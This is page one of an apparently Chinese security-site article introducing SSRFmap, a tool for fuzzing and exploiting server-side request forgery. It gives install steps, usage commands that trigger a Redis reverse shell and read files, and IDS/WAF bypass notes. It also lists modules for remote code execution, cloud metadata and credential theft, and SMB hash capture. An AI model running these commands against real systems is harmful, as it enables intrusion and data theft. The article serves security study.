欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

SSRFmap:一款功能强大的自动化SSRF模糊测试&漏洞利用工具

来源:本站整理 作者:佚名 时间:2019-03-15 TAG: 我要投稿


SSRF,即服务器端请求伪造,很多网络犯罪分子都会利用SSRF来攻击或入侵网络服务。今天我们给大家介绍的这款工具名叫SSRFmap,它可以寻找并利用目标网络服务中的SSRF漏洞。
SSRFmap以Burp请求文件作为输入,研究人员可以利用参数选项来控制模糊测试的操作进程。
项目地址
SSRFmap:【GitHub传送门
工具安装
大家可以直接从GitHub代码库中克隆该项目至本地:
git clone http://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py
 
usage:ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lportLPORT] [--level LEVEL]
 
optional arguments:
  -h, --help    show this help message and exit
  -r REQFILE    SSRF Request file
  -p PARAM      SSRF Parameter to target
  -m MODULES    SSRF Modules to enable
  -l HANDLER    Start an handler for a reverseshell
  --lhost LHOST LHOST reverse shell
  --lport LPORT LPORT reverse shell
  --level [LEVEL]  Level of test to perform (1-5, default: 1)
工具使用
SSRFmap的默认使用方法如下:
#Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
 
#Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242-l 4242
 
# -lcreate a listener for reverse shell on the specified port
#--lhost and --lport work like in Metasploit, these values are used to create areverse shell payload
#--level : ability to tweak payloads in order to bypass some IDS/WAF. e.g:127.0.0.1 -> [::] -> 0000: -> ...
大姐可以使用data/example.py来测试框架是否能够正常运行:
FLASK_APP=data/example.pyflask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
功能模块
SSRFmap已整合了下列功能模块,大家可以使用-m参数来选择使用:
模块名称
模块描述
fastcgi
FastCGI RCE
redis
Redis RCE
github
Github企业版RCE 
zabbix
Zabbix RCE
mysql
MySQL命令执行
docker
Docker Infoleaks(API)
smtp
SMTP邮件发送
Portscan
主机端口扫描
networkscan
HTTP Ping sweep
readfiles
文件读取,例如/etc/passwd
alibaba
从供应商处读取文件 (例如: meta-data, user-data)
aws
从供应商处读取文件 (例如: meta-data, user-data)
gce
从供应商处读取文件 (例如: meta-data, user-data)
digitalocean
从供应商处读取文件 (例如: meta-data, user-data)
socksproxy
SOCKS4 代理
smbhash
通过UNC Path破解SMB认证
tomcat
爆破Tomcat Manager
如果各位想针对特定服务添加自己的功能模块,可以参考下面这个模板代码:
from core.utils import *
import logging
 
name          = "servicename inlowercase"
description   = "ServiceName RCE - What does itdo"
author        = "Name or pseudo of theauthor"
documentation= ["http://link_to_a_research", "http://another_link"]
 
class exploit():
    SERVER_HOST = "127.0.0.1"
    SERVER_PORT = "4242"

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载